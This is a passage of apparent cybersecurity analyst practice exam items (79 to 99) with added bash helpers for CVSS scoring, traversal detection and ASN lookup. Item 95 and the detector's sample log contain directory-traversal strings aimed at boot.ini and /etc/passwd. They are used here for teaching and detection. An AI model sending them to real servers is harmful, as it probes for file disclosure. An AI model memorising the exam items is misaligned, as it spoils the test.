Transfer the malware to a sandbox environment.

D.  

Log in to the affected systems and run netstat.

Questions 79

Security analysts review logs on multiple servers on a daily basis. Which of the following implementations will give the best central visibility into the events occurring throughout the corporate environment without logging in to the servers individually?

Options:

A.  

Deploy a database to aggregate the logging.

B.  

Configure the servers to forward logs to a SIEM.

C.  

Share the log directory on each server to allow local access.

D.  

Automate the emailing of logs to the analysts.

Questions 80

A company recently removed administrator rights from all of its end user workstations. An analyst uses CVSSv3.1 exploitability metrics to prioritize the vulnerabilities for the workstations and produces the following information:

Which of the following vulnerabilities should be prioritized for remediation?

Options:

A.  

nessie.explosion

B.  

vote.4p

C.  

sweet.bike

D.  

great.skills

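The table for this item is not reproduced above, but the arithmetic behind it is fixed by the CVSS v3.1 specification: the exploitability sub-score is 8.22 multiplied by the Attack Vector, Attack Complexity, Privileges Required and User Interaction weights, with Privileges Required weighted higher when scope is changed. The following is an added example (my own code, not CompTIA's or FIRST's) that computes that sub-score and ranks a constructed list of findings; the finding names and vectors are assumptions for the example. The point of the scenario is that once local admin rights are gone, a finding that needs PR:H is the least exploitable on a workstation, while network-reachable PR:N/UI:N findings come first.

```bash
#!/bin/bash
# Added example: CVSS v3.1 exploitability sub-score and a ranking built on it.
# Weights are the published v3.1 metric values; FINDINGS is a constructed list.

# cvss_exploitability AV AC PR UI S
#   AV: N|A|L|P  AC: L|H  PR: N|L|H  UI: N|R  S: U|C  (S only changes the PR weight)
# Prints 8.22 * AV * AC * PR * UI rounded to one decimal place.
cvss_exploitability() {
    LC_ALL=C awk -v av="$1" -v ac="$2" -v pr="$3" -v ui="$4" -v s="$5" 'BEGIN {
        w_av["N"] = 0.85; w_av["A"] = 0.62; w_av["L"] = 0.55; w_av["P"] = 0.20
        w_ac["L"] = 0.77; w_ac["H"] = 0.44
        w_ui["N"] = 0.85; w_ui["R"] = 0.62
        w_pr["N"] = 0.85
        if (s == "C") { w_pr["L"] = 0.68; w_pr["H"] = 0.50 }   # scope changed
        else          { w_pr["L"] = 0.62; w_pr["H"] = 0.27 }   # scope unchanged
        printf "%.1f\n", 8.22 * w_av[av] * w_ac[ac] * w_pr[pr] * w_ui[ui]
    }'
}

# Constructed findings: name, then AV AC PR UI S (assumed vectors, not the exam's)
FINDINGS='browser.rce   N L N R U
local.privesc L L L N U
admin.service L L H N U
net.service   N L N N U'

# rank_findings < findings : "score name" per line, most exploitable first
rank_findings() {
    while read -r name av ac pr ui s; do
        [ -n "$name" ] || continue
        printf '%s %s\n' "$(cvss_exploitability "$av" "$ac" "$pr" "$ui" "$s")" "$name"
    done | LC_ALL=C sort -rn
}

printf '%s\n' "$FINDINGS" | rank_findings
```

The sub-score is only the exploitability half of the base score; impact and, where the scanner supplies them, temporal metrics such as exploit maturity still belong in the final ordering. Removing admin rights does not change the CVSS vector of a PR:H finding, it changes who on the workstation can satisfy it, which is why the scenario treats those findings as lower priority.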
Questions 81

A security analyst receives an alert for suspicious activity on a company laptop. An excerpt of the log is shown below:

Which of the following has most likely occurred?

Options:

A.  

An Office document with a malicious macro was opened.

B.  

A credential-stealing website was visited.

C.  

A phishing link in an email was clicked

D.  

A web browser vulnerability was exploited.

Questions 82

An organization has noticed large amounts of data are being sent out of its network. An analyst is identifying the cause of the data exfiltration.

INSTRUCTIONS

Select the command that generated the output in tabs 1 and 2.

Review the output text in all tabs and identify the file responsible for the malicious behavior.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Options:

Questions 83

A security analyst is trying to identify anomalies on the network routing. Which of the following functions can the analyst use on a shell script to achieve the objective most accurately?

Options:

A.  

function x() { info=$(geoiplookup $1) && echo "$1 | $info" }

B.  

function x() { info=$(ping -c 1 $1 | awk -F "/" 'END{print $5}') && echo "$1 | $info"; }

C.  

function x() { info=$(dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ".in-addr" '{print $1}').origin.asn.cymru.com TXT +short) && echo "$1 | $info"; }

D.  

function x() { info=$(traceroute -m 40 $1 | awk 'END{print $1}') && echo "$1 | $info"; }

Questions 84

An organization needs to bring in data collection and aggregation from various endpoints. Which of the following is the best tool to deploy to help analysts gather this data?

Options:

A.  

DLP

B.  

NAC

C.  

EDR

D.  

NIDS

Questions 85

A security analyst is working on a server patch management policy that will allow the infrastructure team to be informed more quickly about new patches. Which of the following would most likely be required by the infrastructure team so that vulnerabilities can be remediated quickly? (Select two).

Options:

A.  

Hostname

B.  

Missing KPI

C.  

CVE details

D.  

POC availability

E.  

IoCs

F.  

npm identifier

Questions 86

An older CVE with a vulnerability score of 7.1 was elevated to a score of 9.8 due to a widely available exploit being used to deliver ransomware. Which of the following factors would an analyst most likely communicate as the reason for this escalation?

Options:

A.  

Scope

B.  

Weaponization

C.  

CVSS

D.  

Asset value

Questions 87

Which of the following is a reason why proper handling and reporting of existing evidence are important for the investigation and reporting phases of an incident response?

Options:

A.  

To ensure the report is legally acceptable in case it needs to be presented in court

B.  

To present a lessons-learned analysis for the incident response team

C.  

To ensure the evidence can be used in a postmortem analysis

D.  

To prevent the possible loss of a data source for further root cause analysis

Questions 88

A payroll department employee was the target of a phishing attack in which an attacker impersonated a department director and requested that direct deposit information be updated to a new account. Afterward, a deposit was made into the unauthorized account. Which of the following is one of the first actions the incident response team should take when they receive notification of the attack?

Options:

A.  

Scan the employee's computer with virus and malware tools.

B.  

Review the actions taken by the employee and the email related to the event

C.  

Contact human resources and recommend the termination of the employee.

D.  

Assign security awareness training to the employee involved in the incident.

Questions 89

Which of the following is a commonly used four-component framework to communicate threat actor behavior?

Options:

A.  

STRIDE

B.  

Diamond Model of Intrusion Analysis

C.  

Cyber Kill Chain

D.  

MITRE ATT&CK

Questions 90

A security team is concerned about recent Layer 4 DDoS attacks against the company website. Which of the following controls would best mitigate the attacks?

Options:

A.  

Block the attacks using firewall rules.

B.  

Deploy an IPS in the perimeter network.

C.  

Roll out a CDN.

D.  

Implement a load balancer.

Questions 91

A software developer has been deploying web applications with common security risks, including insufficient logging capabilities. Which of the following actions would be most effective to reduce risks associated with the application development?

Options:

A.  

Perform static analyses using an integrated development environment.

B.  

Deploy compensating controls into the environment.

C.  

Implement server-side logging and automatic updates.

D.  

Conduct regular code reviews using OWASP best practices.

Questions 92

The security analyst received the monthly vulnerability report. The following findings were included in the report:

• Five of the systems only required a reboot to finalize the patch application.

• Two of the servers are running outdated operating systems and cannot be patched.

The analyst determines that the only way to ensure these servers cannot be compromised is to isolate them. Which of the following approaches will best minimize the risk of the outdated servers being compromised?

Options:

A.  

Compensating controls

B.  

Due diligence

C.  

Maintenance windows

D.  

Passive discovery

Questions 93

After a security assessment was done by a third-party consulting firm, the cybersecurity program recommended integrating DLP and CASB to reduce analyst alert fatigue. Which of the following is the best possible outcome that this effort hopes to achieve?

Options:

A.  

SIEM ingestion logs are reduced by 20%.

B.  

Phishing alerts drop by 20%.

C.  

False positive rates drop to 20%.

D.  

The MTTR decreases by 20%.

Questions 94

A penetration tester submitted data to a form in a web application, which enabled the penetration tester to retrieve user credentials. Which of the following should be recommended for remediation of this application vulnerability?

Options:

A.  

Implementing multifactor authentication on the server OS

B.  

Hashing user passwords on the web application

C.  

Performing input validation before allowing submission

D.  

Segmenting the network between the users and the web server

Questions 95

While reviewing the web server logs, a security analyst notices the following snippet:

..\../..\../boot.ini

Which of the following is being attempted?

Options:

A.  

Directory traversal

B.  

Remote file inclusion

C.  

Cross-site scripting

D.  

Remote code execution

E.  

Enumeration of /etc/passwd

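The snippet above mixes backslashes and forward slashes so that a filter looking only for "../" misses it while a Windows file API still walks up to the drive root. The following is an added example (my own code, not the exam's) that normalises a request path the way a permissive server would, percent-decoding one level, folding backslashes to slashes and collapsing repeated slashes, and then flags any ".." segment; it runs over a constructed access-log excerpt. The log lines, the single decoding pass and the log format are assumptions of the example.

```bash
#!/bin/bash
# Added example: detect directory traversal in web server request lines after
# normalising the path. SAMPLE_LOG is a constructed access-log excerpt.

# normalize_path PATH : one level of percent-decoding for . / \, fold backslashes
# to slashes, collapse repeated slashes. Prints the result.
normalize_path() {
    printf '%s' "$1" | sed -e 's/%2[eE]/./g' -e 's/%2[fF]/\//g' -e 's/%5[cC]/\//g' \
                           -e 's/\\/\//g' -e 's/\/\/*/\//g'
}

# is_traversal PATH : exit 0 if any segment of the normalised path is ".."
is_traversal() {
    case "/$(normalize_path "$1")/" in
        */../*) return 0 ;;
        *)      return 1 ;;
    esac
}

SAMPLE_LOG='10.9.8.7 - - [10/Oct/2024:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512
10.9.8.7 - - [10/Oct/2024:10:01:03 +0000] "GET /..\../..\../boot.ini HTTP/1.1" 404 0
10.9.8.7 - - [10/Oct/2024:10:01:04 +0000] "GET /img/..%2F..%2Fetc/passwd HTTP/1.1" 403 0
10.9.8.7 - - [10/Oct/2024:10:01:05 +0000] "GET /static/app..min.js HTTP/1.1" 200 2048'

# flag_traversal < access-log : prints "<client-ip> <raw-path>" per traversal attempt
flag_traversal() {
    while IFS= read -r line; do
        ip=${line%% *}
        req=${line#*\"}; req=${req%%\"*}     # GET /path HTTP/1.1
        path=${req#* }; path=${path%% *}
        if is_traversal "$path"; then
            printf '%s %s\n' "$ip" "$path"
        fi
    done
}

# Live use: flag_traversal < /var/log/apache2/access.log
printf '%s\n' "$SAMPLE_LOG" | flag_traversal
```

The ".." test runs on path segments, so a legitimate file name such as app..min.js is not flagged. Double encoding (%252e) survives a single decode pass and is a standard filter bypass; when hunting rather than alerting, decode until the string stops changing, and compare against the path the server actually resolved, which the 404 versus 200 status in the same log line already hints at.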
Questions 96

A security analyst has prepared a vulnerability scan that contains all of the company's functional subnets. During the initial scan, users reported that network printers began to print pages that contained unreadable text and icons.

Which of the following should the analyst do to ensure this behavior does not occur during subsequent vulnerability scans?

Options:

A.  

Perform non-credentialed scans.

B.  

Ignore embedded web server ports.

C.  

Create a tailored scan for the printer subnet.

D.  

Increase the threshold length of the scan timeout.

Questions 97

A company recently experienced a security incident. The security team has determined a user clicked on a link embedded in a phishing email that was sent to the entire company. The link resulted in a malware download, which was subsequently installed and run.

INSTRUCTIONS

Part 1

Review the artifacts associated with the security incident. Identify the name of the malware, the malicious IP address, and the date and time when the malware executable entered the organization.

Part 2

Review the kill chain items and select an appropriate control for each that would improve the security posture of the organization and would have helped to prevent this incident from occurring. Each control may only be used once, and not all controls will be used.

Firewall log:

File integrity Monitoring Report:

Malware domain list:

Vulnerability Scan Report:

Phishing Email:

Options:

Questions 98

A security analyst is writing a shell script to identify IP addresses from the same country. Which of the following functions would help the analyst achieve the objective?

Options:

A.  

function w() { info=$(ping -c 1 $1 | awk -F "/" 'END{print $1}') && echo "$1 | $info"; }

B.  

function x() { info=$(geoiplookup $1) && echo "$1 | $info"; }

C.  

function y() { info=$(dig -x $1 | grep PTR | tail -n 1) && echo "$1 | $info"; }

D.  

function z() { info=$(traceroute -m 40 $1 | awk 'END{print $1}') && echo "$1 | $info"; }

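Items 83 and 98 ask the same thing from two angles: which helper adds the attribute (country, or origin ASN and prefix) that turns a bare IP into something an analyst can group or baseline. Option C of item 83 queries Team Cymru's DNS-based IP-to-ASN service; the following is an added example (my own code, not the exam's) that does the same lookup with the query name built directly from the reversed octets instead of via a PTR record, and separates the answer parsing so it can be checked offline. The TXT answer in the block is a constructed sample in the service's documented "AS | prefix | CC | registry | date" layout, using a documentation ASN and TEST-NET range; the country code field it yields is the grouping key item 98 is after.

```bash
#!/bin/bash
# Added example: IP-to-ASN (and country) lookup via Team Cymru's DNS service,
# split so the parsing can be exercised offline. SAMPLE_TXT is a constructed answer.

# cymru_query_name IPV4 : reversed octets + origin zone
#   10.1.2.3 -> 3.2.1.10.origin.asn.cymru.com
cymru_query_name() {
    printf '%s\n' "$1" | awk -F. '{ print $4 "." $3 "." $2 "." $1 ".origin.asn.cymru.com" }'
}

# parse_cymru_txt TXT : from '"AS | prefix | CC | registry | date"' print "AS CC prefix"
parse_cymru_txt() {
    printf '%s\n' "$1" | tr -d '"' | awk -F'|' '{ gsub(/ /, ""); print $1, $3, $2 }'
}

# asn_lookup IPV4 : live lookup (needs dig and DNS); not executed by the example
asn_lookup() {
    parse_cymru_txt "$(dig +short "$(cymru_query_name "$1")" TXT)"
}

# Constructed sample answer (documentation ASN and TEST-NET-3 prefix, placeholder CC);
# a real answer may contain several lines when the IP sits in overlapping prefixes
SAMPLE_TXT='"64496 | 203.0.113.0/24 | ZZ | example | 2024-01-01"'

# enrich IP TXT : the "ip | info" line the question's functions print
enrich() {
    printf '%s | %s\n' "$1" "$(parse_cymru_txt "$2")"
}

enrich 203.0.113.7 "$SAMPLE_TXT"
```

Routing anomalies show up as an IP whose origin ASN or prefix differs from what the baseline recorded for that host, which geoiplookup alone cannot tell you; geoiplookup answers the narrower question in item 98. Both depend on a local GeoIP database or on DNS reaching the Cymru zone, so run them from an enrichment host rather than from a system under investigation.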
Questions 99

An organization has tracked several incidents that are listed in the following table:

Which of the following is the organization's MTTD?

Options:

A.  

140

B.  

150

C.  

160

D.  

180
